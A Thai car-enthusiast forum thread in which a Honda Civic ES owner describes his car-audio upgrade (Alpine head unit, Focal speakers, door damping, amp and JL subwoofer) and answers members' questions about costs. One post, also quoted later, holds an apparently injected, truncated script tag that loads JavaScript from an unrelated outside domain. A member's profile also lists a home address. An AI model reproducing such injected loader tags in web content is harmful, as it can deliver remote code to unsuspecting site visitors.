ตอบ
athongchum

ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 26 กุมภา 2014 23:16 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
รถตอนนี้ก็เริ่มกลับสภาพเดิมแล้ว เลิกแต่งซิ่ง กลับมาโดนเครื่องเสียงท่าทางจะหนักกว่าเดิมอีกแฮะ

ที่ทำมาเป็นระบบ SQ front stage

เริ่มแรกจากวิทยุติดรถพัง เลยถือโอกาสเปลี่ยนทั้ง Front ทั้งลำโพงใหม่ด้วยเลย ตอนแรกก็ตั้งงบไว้แค่ขำๆพอฟังได้

พอเริ่มหาข้อมูลและไปลองฟังเสียง สุดท้ายได้ชุดนี้มา เป็นระบบ Hi power

Front Alpine CDE141
ลำโพง 6" แยกชิ้น Focal 165PS
หล่อเสา A
แดมป์ประตู 1 ชั้นด้านใน

เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )

เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )

แล้วก็ผันตัวเองไปฝังในเวปเครื่องเสียง ไม่เกินคาด " คัน " เสียเงินอีกแล้ว

แดมป์ประตูด้านนอก
เปิดหน้าลำโพง

​เปิดหน้าลำโพงมีหลายแบบครับ แต่ส่วนใหญ่จะเปิดแบบลำโพงยึดทับแผงประตู
ข้อดีคือแผงประตูจะแน่นขึ้น ลดการกะพรือได้
ข้อเสียคือเปิดแผงประตูลำบากต้องถอดลำโพงก่อน และส่วนใหญ่สายจุดนี้จะถูกบัดกรีเข้าที่ขั้วลำโพง ถอดลำโพงต้องตัดและเชื่อมใหม่

ของผมเปิดแบบยึดลำโพงกับโครงประตู แผงประตูเปิดเป็นช่องครอบหน้าลำโพงไว้เฉยๆ แบบนี้ทำยากกว่า
ข้อดีคือถอดแผงประตูง่าย ไม่ต้องยุ่งกับลำโพง
ข้อเสียคือแผงประตูไม่แน่นเท่ากับวิธีด้านบน

ข้อดีของการเปิดหน้าลำโพง จะได้เสียงกลาง เสียงมิดเบสที่ดีขึ้น แน่นขึ้น กระชับขึ้น ลดเสียงก้องลดความถี่เรโซแนนซ์ในแผงประตู

สำหรับผมการเปิดหน้าลำโพง คุ้มค่ามากกว่าการเพิ่มงบลำโพงเป็นสองเท่า

ปกติร้านนี้จะทำแบบแยกชิ้นหุ้มหนัง แต่มันทำยากพอสมควรผมเลยให้ช่างโป้วลงแผงประตูไปเลย ผมเอามาทำสีเอง ตอนนี้ก็ขี้เกียจ เลยพ่นสีปิดไว้ขำๆไปก่อน

และแล้วก็มีรอบที่ 3 รอบนี้ เพิ่มแอมป์ เพิ่ม Sub

Amp DLS CA31
Sub JL10W0V3

สำหรับตอนนี้มีแค่นี้ครับ แต่คิดว่าหลวมตัวเข้ามาแล้วไม่ได้หยุดอยู่แค่นี้แน่นอน

ส่วนเรื่องเสียง Focal เสียงจะค่อนข้างสดจัดจ้านนิดนึงครับ เสียงกลางสะอาด เสียงแหลมจะสดนิดนึง เบสค่อนไปทางบางเบสน้อยมากแต่ได้ Sub มาช่วยแล้วตอนนี้ผมชอบมากๆครับ JL10W0V3 เสียงต่ำลงได้ลึกใช้ได้หัวเบสดีมาก ใครชอบฟังเพราะๆแนว SQ จัดไป

Attached File :

แก้ไขล่าสุดโดย เมื่อ ศุกร์, 28 กุมภา 2014 15:42, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: honda01  raphael1984  boyboom_16  nooduean_69  surasaka  chan-o  nammon_211  tongkrab  rta050  qq  CAV_BANK  Nine_Eleven  der1  Thetom  damrongwit.sroyproh.7  black_boy  yam  ฺBlackBle  pongz19  Bonuses01 
raphael1984

เข้าร่วม: 06 มิถุนา 2013
ตอบ: 854

Guru ES
Guru ES

ได้รับคำขอบคุณ: 826
ให้คำขอบคุณ: 1161

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 27 กุมภา 2014 00:07 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
...
ได้รับคำขอบคุณจาก: athongchum 
Hnong

ชื่อเล่น: หน่อง

เข้าร่วม: 30 พฤษภาคม 2013
ตอบ: 1189

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 590
ให้คำขอบคุณ: 401

พฤหัส, 27 กุมภา 2014 07:44 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
เจ๋งมาก
ปัญญากระด้าง

เข้าร่วม: 06 มกรา 2014
ตอบ: 122

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 89
ให้คำขอบคุณ: 9

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 27 กุมภา 2014 07:49 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
พอบอกค่าเสียหายได้เปล่า 
ได้รับคำขอบคุณจาก: athongchum  ake_farlikit 
Saka

ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ปี: 2001
พฤหัส, 27 กุมภา 2014 09:54 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
ขอรายละเอียดในการเปิดหน้าลำโพง ได้ป่าวครับ สนใจจะทำมานานแล้วแต่ยังไม่ได้ทำซักที
เวลาถอดแผงประตู ลำโพงยังติดอยู่ที่ประตูเหมือนเดิมใช่ป่าวครับ แล้วเวลาถอดแผงประตูยังทำได้เหมือนเดิมมั้ยครับ ทำร้านไหนมาครับเฉพาะเปิดหน้าลำโพงค่าเสียหายเท่าไรครับ
ขอบคุณครับ
athongchum

ครอบครัว ES
ครอบครัว ES

พฤหัส, 27 กุมภา 2014 11:10 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
ปัญญากระด้าง พิมพ์ว่า:
พอบอกค่าเสียหายได้เปล่า 

ถ้าเบิกใหม่หมดงบ 4x,xxx ครับ สายไฟสายสัญญาณสายลำโพงแบบมาตรฐานทองแดงแท้

Saka พิมพ์ว่า:
ขอรายละเอียดในการเปิดหน้าลำโพง ได้ป่าวครับ สนใจจะทำมานานแล้วแต่ยังไม่ได้ทำซักที
เวลาถอดแผงประตู ลำโพงยังติดอยู่ที่ประตูเหมือนเดิมใช่ป่าวครับ แล้วเวลาถอดแผงประตูยังทำได้เหมือนเดิมมั้ยครับ ทำร้านไหนมาครับเฉพาะเปิดหน้าลำโพงค่าเสียหายเท่าไรครับ
ขอบคุณครับ

เปิดหน้าลำโพงมีหลายแบบครับ แต่ส่วนใหญ่จะเปิดแบบลำโพงยึดทับแผงประตู
ข้อดีคือแผงประตูจะแน่นขึ้น ลดการกะพรือได้
ข้อเสียคือเปิดแผงประตูลำบากต้องถอดลำโพงก่อน และส่วนใหญ่สายจุดนี้จะถูกบัดกรีเข้าที่ขั้วลำโพง ถอดลำโพงต้องตัดและเชื่อมใหม่

ของผมเปิดแบบยึดลำโพงกับโครงประตู แผงประตูเปิดเป็นช่องครอบหน้าลำโพงไว้เฉยๆ แบบนี้ทำยากกว่า
ข้อดีคือถอดแผงประตูง่าย ไม่ต้องยุ่งกับลำโพง
ข้อเสียคือแผงประตูไม่แน่นเท่ากับวิธีด้านบน

ข้อดีของการเปิดหน้าลำโพง จะได้เสียงกลาง เสียงมิดเบสที่ดีขึ้น แน่นขึ้น กระชับขึ้น ลดเสียงก้องลดความถี่เรโซแนนซ์ในแผงประตู

สำหรับผมการเปิดหน้าลำโพง คุ้มค่ามากกว่าการเพิ่มงบลำโพงเป็นสองเท่า

ส่วนค่าเสียหาย เริ่มต้นตั้งแต่ 2000 ไปจนถึง 5000 แล้วแต่ร้านครับ ผมทำที่สุชาติซาวด์ แต่รู้สึกว่าร้านนี้จะไม่รับทำให้คนนอกครับ ทำให้เฉพาะลูกค้าที่ติดไปจากที่ร้านเท่านั้นครับ

ถ้าอยากเปิดจริงๆ เดี๋ยวผมไปหาร้านกับราคามาให้ครับ ถ้าพี่สนใจจริงๆ
ได้รับคำขอบคุณจาก: Saka  note_okaasan 
AUM_Love_civic

ชื่อเล่น: อั้ม

เข้าร่วม: 27 กรกฎา 2013
ตอบ: 913

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 643
ให้คำขอบคุณ: 328

สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 27 กุมภา 2014 12:33 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
..
chan-o

ชื่อเล่น: โอ๋

เข้าร่วม: 26 เมษา 2013
ตอบ: 950

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 879
ให้คำขอบคุณ: 3132

ปี: 2005
พฤหัส, 27 กุมภา 2014 15:58 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
แจ่มเบย
theerawaat

เข้าร่วม: 02 ตุลา 2013
ตอบ: 201

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 301
ให้คำขอบคุณ: 367

ปี: 2004
พฤหัส, 27 กุมภา 2014 16:55 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
สวยจัง 
nammon_211

ชื่อเล่น: น้ำมนต์

เข้าร่วม: 12 มิถุนา 2013
ตอบ: 2081

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1949
ให้คำขอบคุณ: 1031

พฤหัส, 27 กุมภา 2014 16:59 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
เจ๋งมาก
note_okaasan

ชื่อเล่น: สมุดโน้ต

เข้าร่วม: 29 พฤษภาคม 2013
ตอบ: 665

Guru ES
Guru ES

ได้รับคำขอบคุณ: 268
ให้คำขอบคุณ: 665

พฤหัส, 27 กุมภา 2014 17:10 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
มันสวดยวด
tongkrab

ชื่อเล่น: โต้งครับ

ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 83
ให้คำขอบคุณ: 11

ปี: 2002
พฤหัส, 27 กุมภา 2014 17:23 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
คันเก่าผมโดนไปเกือบแสน เล่น sq เหมือนกันครับ alpine 9833 แอมป์ audison lrx ลำโพง morel hybrid ovation ซับ image dynamic id10 เสียงฟังดีมากๆครับ หวาน เนียน อิ่ม ใส รายละเอียดดีมาก ขายรถคันเก่า ผมก็ถอดเครื่องเสียงขายหมดเลย จนมาถึง es ยังไม่ได้ทำอะไรเกี่ยวกะเครื่องเสียงเลย ได้มือสองมา มีฟร้อนท์ 1din ของไพโอเนียร์ กะลำโพง 6*9 ติดข้างหลัง ฟังข่าวพอได้อยู่ครับ แต่ฟังเพลงไม่ไหวจะเคลียร์

คิดว่าถ้ามีงบจะลงชุดเล็กๆพอฟังได้ก็พอแล้ว เพราะชุดในรถ อย่างชุดที่ผมเคยติดข้างบน หมดไปเกือบแสน ฟังยังไงก็สู้ชุดใหญ่ในห้องฟังที่บ้านไม่ได้ครับ ในงบเท่าๆกัน เครื่องบ้านเสียงดีกว่ามากๆๆ เครื่องเสียงรถยนต์องค์ประกอบตัวแปรมันเยอะครับ

ได้รับคำขอบคุณจาก: athongchum  J_online 
athongchum

ครอบครัว ES
ครอบครัว ES

พฤหัส, 27 กุมภา 2014 18:05 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
tongkrab พิมพ์ว่า:
คันเก่าผมโดนไปเกือบแสน เล่น sq เหมือนกันครับ alpine 9833 แอมป์ audison lrx ลำโพง morel hybrid ovation ซับ image dynamic id10 เสียงฟังดีมากๆครับ หวาน เนียน อิ่ม ใส รายละเอียดดีมาก ขายรถคันเก่า ผมก็ถอดเครื่องเสียงขายหมดเลย จนมาถึง es ยังไม่ได้ทำอะไรเกี่ยวกะเครื่องเสียงเลย ได้มือสองมา มีฟร้อนท์ 1din ของไพโอเนียร์ กะลำโพง 6*9 ติดข้างหลัง ฟังข่าวพอได้อยู่ครับ แต่ฟังเพลงไม่ไหวจะเคลียร์

คิดว่าถ้ามีงบจะลงชุดเล็กๆพอฟังได้ก็พอแล้ว เพราะชุดในรถ อย่างชุดที่ผมเคยติดข้างบน หมดไปเกือบแสน ฟังยังไงก็สู้ชุดใหญ่ในห้องฟังที่บ้านไม่ได้ครับ ในงบเท่าๆกัน เครื่องบ้านเสียงดีกว่ามากๆๆ เครื่องเสียงรถยนต์องค์ประกอบตัวแปรมันเยอะครับ

ชุดคลาสสิกเลยนะครับพี่ อย่างว่าครับ งบเท่ากันเครื่องรถสู้เครื่องบ้านไม่ได้ แต่ก็อย่างว่าอีกนั่นแหละเราไม่สามารถยกเครื่องบ้านไปฟังตอนขับรถได้มันก็ต้องยอมเสียตังค์ทำในรถอีกครับ

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: CAV_BANK  chan-o 
chongdate

ชื่อเล่น: ฉ่ง

เข้าร่วม: 29 พฤศจิกา 2013
ตอบ: 22

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 14
ให้คำขอบคุณ: 0

ที่อยู่: 2/343 หมู่บ้านพฤกษาวิลล์ แขวงคลองถนน เขตสายไหม กรุงเทพ 10220
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พฤหัส, 27 กุมภา 2014 22:20 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
อยากทำมั่งครับ
tongkrab

ชื่อเล่น: โต้งครับ

ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 83
ให้คำขอบคุณ: 11

ปี: 2002
ศุกร์, 28 กุมภา 2014 14:50 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
athongchum พิมพ์ว่า:

ชุดคลาสสิกเลยนะครับพี่ อย่างว่าครับ งบเท่ากันเครื่องรถสู้เครื่องบ้านไม่ได้ แต่ก็อย่างว่าอีกนั่นแหละเราไม่สามารถยกเครื่องบ้านไปฟังตอนขับรถได้มันก็ต้องยอมเสียตังค์ทำในรถอีกครับ

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></

กะว่าจะลงชุดประมาณคุณ athongchum นี่ล่ะครับ งบซัก 3 หมื่นน่าจะได้อยู่ ฟร้อนท์ก็ใช้ตัวไพโอเนียร์ตัวเดิมที่ติดกะรถมา เพลงฟังในรถส่วนใหญ่ก็เพลงตลาดทั่วไปอ่ะครับ ชุดประมาณนี้ก็ฟังดีพอควรแล้ว เพื่อนผมออกรถใหม่ก็ลงประมาณนี้ล่ะครับ จูน-ติดตั้งดีๆเสียงออกมาดีใช้ได้เลย
athongchum

ครอบครัว ES
ครอบครัว ES

ศุกร์, 28 กุมภา 2014 15:08 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
[quote="tongkrab"]
athongchum พิมพ์ว่า:

กะว่าจะลงชุดประมาณคุณ athongchum นี่ล่ะครับ งบซัก 3 หมื่นน่าจะได้อยู่ ฟร้อนท์ก็ใช้ตัวไพโอเนียร์ตัวเดิมที่ติดกะรถมา เพลงฟังในรถส่วนใหญ่ก็เพลงตลาดทั่วไปอ่ะครับ ชุดประมาณนี้ก็ฟังดีพอควรแล้ว เพื่อนผมออกรถใหม่ก็ลงประมาณนี้ล่ะครับ จูน-ติดตั้งดีๆเสียงออกมาดีใช้ได้เลย

แค่นี้ก็ฟินมากแล้ว แต่คงจะหยุดยากสำหรับคนที่เพิ่งจะเริ่มต้นอย่างผม ยังต้องเลือดอาบอีกเยอะครับ 555555
anek_civices

เข้าร่วม: 20 กุมภา 2014
ตอบ: 4

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 1
ให้คำขอบคุณ: 7
อังคาร, 4 มีนา 2014 13:01 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
หุ หุ รับรองได้เลยครับว่าไม่หยุดแค่นี้แน่ถ้ามาทางนี้แล้ว
jokesurway

ชื่อเล่น: โจ๊ก

เข้าร่วม: 30 สิงหา 2012
ตอบ: 289

ได้รับคำขอบคุณ: 247
ให้คำขอบคุณ: 0

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 4 มีนา 2014 15:00 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
อยากสอบถามว่าค่าตีตู้ พร้อมค่าตู้ค่าดอก ค่าพาวเวอร์แอมป์ เท่าไหร่ครับ เฉพาะที่พูดมาน่ะ
athongchum

ครอบครัว ES
ครอบครัว ES

อังคาร, 4 มีนา 2014 20:09 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
anek_civices พิมพ์ว่า:
หุ หุ รับรองได้เลยครับว่าไม่หยุดแค่นี้แน่ถ้ามาทางนี้แล้ว

คงงั้นครับพี่ ผมเตรียมใจไว้แล้ว 555

jokesurway พิมพ์ว่า:
อยากสอบถามว่าค่าตีตู้ พร้อมค่าตู้ค่าดอก ค่าพาวเวอร์แอมป์ เท่าไหร่ครับ เฉพาะที่พูดมาน่ะ

ดอก 4000 ค้าตีตู้ 3000 ขึ้นไป แอมป์ 10000 ไม่รวมติดตั้งไม่รวมสายครับ
vor_ped

ชื่อเล่น: เป็ด

เข้าร่วม: 07 พฤษภาคม 2010
ตอบ: 560

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 920
ให้คำขอบคุณ: 1040

สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 5 มีนา 2014 10:22 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
ทำร้านเดียวกันเลยครับ พึ่งไปเปลี่ยน Amp เป็น Amp หลอดของทางร้านมา เสียงดีขึ้นเยอะเลย
athongchum

ครอบครัว ES
ครอบครัว ES

พุธ, 5 มีนา 2014 13:38 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
vor_ped พิมพ์ว่า:
ทำร้านเดียวกันเลยครับ พึ่งไปเปลี่ยน Amp เป็น Amp หลอดของทางร้านมา เสียงดีขึ้นเยอะเลย

แล้วคู่หน้ากับsubใช้รุ่นไหนครับ
vor_ped

ชื่อเล่น: เป็ด

เข้าร่วม: 07 พฤษภาคม 2010
ตอบ: 560

ได้รับคำขอบคุณ: 920
ให้คำขอบคุณ: 1040

พุธ, 5 มีนา 2014 15:51 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
อ้างอิงจาก:
แล้วคู่หน้ากับsubใช้รุ่นไหนครับ

คู่หน้าเป็นลำโพงยี่ห้อ Morel ครับแต่จำรุ่นไม่ได้ ส่วน Sub เป็นของ JL ครับ
yam

ชื่อเล่น: แยม

เข้าร่วม: 28 เมษา 2012
ตอบ: 818

Guru ES
Guru ES

ได้รับคำขอบคุณ: 926
ให้คำขอบคุณ: 1203

พุธ, 5 มีนา 2014 16:55 - เลิกแต่งซิ่ง นึกว่าจะเหลือตังค์ กลับมาโดนเครื่องเสียงแทน ( SQ Front stage )
...
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.